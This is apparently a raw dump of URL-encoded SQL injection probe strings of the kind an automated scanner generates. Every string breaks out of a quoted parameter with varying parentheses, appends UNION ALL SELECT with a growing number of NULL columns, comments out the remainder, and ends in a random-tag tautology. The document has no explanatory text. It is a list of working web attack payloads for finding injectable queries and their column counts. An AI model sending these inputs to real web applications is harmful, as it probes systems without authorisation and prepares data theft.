1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27VEcB%27%3D%27VEcB 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27dclJ%27%3D%27dclJ 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27ahyT%27%3D%27ahyT 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27AZOL%27%3D%27AZOL 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27UeVG%27%3D%27UeVG 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27QwMD%27%3D%27QwMD 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27iShY%27%3D%27iShY 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27JKqq%27%3D%27JKqq 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27xxlE%27%3D%27xxlE 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27fGkH%27%3D%27fGkH 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27DUJW%27%3D%27DUJW 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27XuQv%27%3D%27XuQv 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27ejXo%27%3D%27ejXo 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27QgES%27%3D%27QgES 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27hUmc%27%3D%27hUmc 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27EjsC%27%3D%27EjsC 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27wgRM%27%3D%27wgRM 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27mFQw%27%3D%27mFQw 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27HIUN%27%3D%27HIUN 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27zTth%27%3D%27zTth 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27TZpB%27%3D%27TZpB 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27pfcY%27%3D%27pfcY 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27zGmI%27%20LIKE%20%27zGmI 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27YYHP%27%20LIKE%20%27YYHP 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27aYTR%27%20LIKE%20%27aYTR 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27VFtj%27%20LIKE%20%27VFtj 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27tNWD%27%20LIKE%20%27tNWD 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27CTUd%27%20LIKE%20%27CTUd 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27EYRf%27%20LIKE%20%27EYRf 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27MeJI%27%20LIKE%20%27MeJI 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27sIyj%27%20LIKE%20%27sIyj 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27Urkt%27%20LIKE%20%27Urkt 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27lXrK%27%20LIKE%20%27lXrK 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27ijwy%27%20LIKE%20%27ijwy 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27pVzT%27%20LIKE%20%27pVzT 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27qmKN%27%20LIKE%20%27qmKN 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27uwFj%27%20LIKE%20%27uwFj 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27ERAS%27%20LIKE%20%27ERAS 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27MsZJ%27%20LIKE%20%27MsZJ 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27JhaY%27%20LIKE%20%27JhaY 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27jMoO%27%20LIKE%20%27jMoO 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27rIjX%27%20LIKE%20%27rIjX 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27UYqM%27%20LIKE%20%27UYqM 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27zuva%27%20LIKE%20%27zuva 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27PPKu%27%20LIKE%20%27PPKu 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27gFNi%27%20LIKE%20%27gFNi 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27NPXO%27%20LIKE%20%27NPXO 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27zVCA%27%20LIKE%20%27zVCA 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27XKPg%27%20LIKE%20%27XKPg 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27uVzR%27%20LIKE%20%27uVzR 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27FlQC%27%20LIKE%20%27FlQC 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27gnsB%27%20LIKE%20%27gnsB 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27gjBf%27%20LIKE%20%27gjBf 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27cwwm%27%20LIKE%20%27cwwm 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27Xkck%27%20LIKE%20%27Xkck 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27QZJI%27%20LIKE%20%27QZJI 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27aOvs%27%20LIKE%20%27aOvs 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27bQJy%27%20LIKE%20%27bQJy 